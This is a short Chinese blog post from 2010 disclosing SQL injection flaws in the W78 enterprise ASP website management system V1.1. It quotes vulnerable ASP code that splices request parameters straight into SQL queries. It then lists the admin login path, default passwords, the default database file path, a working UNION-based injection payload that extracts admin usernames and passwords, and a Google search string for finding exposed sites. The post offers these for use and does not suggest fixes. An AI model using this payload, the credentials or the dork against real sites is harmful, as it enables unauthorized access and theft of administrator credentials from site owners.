分类: 网络与安全
2010-03-21 00:08:27
W78企业ASP网站管理系统V1.1的SQL注入
裸奔的系统。
1.shopmore.asp
set rs=server.createobject("adodb.recordset")
exec="select * from [shop] where ssfl="& request.QueryString("id") &" order by id desc "
rs.open exec,conn,1,1
if rs.eof then
response.Write " 该分类暂无产品!"
else
rs.PageSize =20 '每页记录条数
iCount=rs.RecordCount '记录总数
iPageSize=rs.PageSize
maxpage=rs.PageCount
page=request("page")
if Not IsNumeric(page) or page="" then
page=1
2.about.asp
exec="select * from [about] where id="& request.QueryString("id")
set rs=server.createobject("adodb.recordset")
rs.open exec,conn,1,1
3.search_news.asp
dim title
title=request.form("form_news")
set rs=conn.execute("select * from [news] where title like '%"&title&"%'")
if title="" then
response.write ("")
end if
if rs.eof then
response.write ("")
还有其他的页面。
4.此系统的在线编辑登录页面为admin/eWebEditor/admin/login.asp
默认user:admin password:198625
不能进的还可以试试
后台默认密码为86779533 abc123这两个
试试数据库默认地址为/data/%23sze7xiaohu.mdb
exp:
搜索型注入:%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
Google:inurl:ShopMore.asp?id